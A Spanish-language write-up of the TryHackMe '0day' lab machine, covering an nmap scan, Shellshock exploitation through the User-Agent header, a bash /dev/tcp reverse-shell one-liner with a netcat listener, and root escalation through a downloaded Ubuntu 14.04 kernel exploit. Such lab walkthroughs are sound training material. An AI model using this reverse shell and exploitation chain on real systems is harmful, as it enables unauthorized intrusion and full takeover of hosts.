TryHackme 0day
Hoy vamos a resolver la maquina 0day, es una maquina bonita de dificultad media muy sencilla.
Vamos por lo basico ya se la saben, Nmap para ver los puertos que estan abiertos.
# Nmap 7.94SVN scan initiated Sun Dec 10 15:01:08 2023 as: nmap -sCV -p22,80 -oN target.txt 10.10.248.240
Nmap scan report for 10.10.248.240
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
| 2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
| 256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_ 256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: 0day
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 10 15:01:18 2023 -- 1 IP address (1 host up) scanned in 9.61 secondsAhora igualmente usando Nmap lo lanzamos para ver que versiones y servicios corren para estos puertos.
Si vamos al puerto 80 donde esta la web este es lo que observamos nada util.
Wfuzz
Ahora haciendo uso de Wfuzz vamos a enumerar directorios ocultos dentro de la maquina el cual nos encontramos con varios pero el que nos interesa es cgi-bin.
Ya que la maquina es vulnerable a un ShellShock y nos aprovecharemos de este directorio.
Y bueno de esta forma se explota un ShellShock el payload lo metemos en el User-Agent, observamos que podemos leer el /etc/passwd de la maquina, nos interpreta los comando es decir que podemos ganar acceso.
Ahora ganamos acceso en el User-Agent ponemos el tipica cadena de bash -i >& /dev/tcp/IP/Port 0>&1.
En la parte de abajo nos ponemos en escucha con Netcat y observamos que ganamos acceso como el usuario www-data.
Capturamos nuestra primera bandera la de user.txt.
Escalada de Privilegios
Wachamos el kernel del ubuntu el cual es un 14.04 que es vulnerable a una escalada de privilegios.
Busca el exploit usando searchsploit ubuntu 14.04 y te descargas este exploit que esta hecho en C con este numero de identificado 37292.
Ahora en en nuestra maquina en local nos compartimos un servidor con python.
Como punto numero dos desde la maquina victima usando wget nos descargamos el .C.
Le cambiamos el nombre a ofs.c, pero si lo intentamos ejecutar como dice en el Poc del exploit nos dice No such file or directory en español No existe tal archivo o directorio, esto se refiere al compilador gcc.
La ruta de gcc es /usr/bin/gcc. Pero podemos manipular el PATH para que la ruta empieze donde nosotros queramos.
Si hacemos un echo $PATH. Observamos que el PATH inicia en /usr/local/bin.
Pero si hacemos un export PATH=/tmp:$PATH y volvemos a hacer un echo $PATH.
Observamos que el PATH ahora inicia donde nostros lo hemos definido en el directorio /tmp.
Ahora si seguimos el Poc que nos daban en el exploit y ejecutamos, observamos que nos convertimos en root, y bueno capturamos nuestra ultima bandera la de root.txt. Y bueno MAQUINA RESUELTA
Última actualización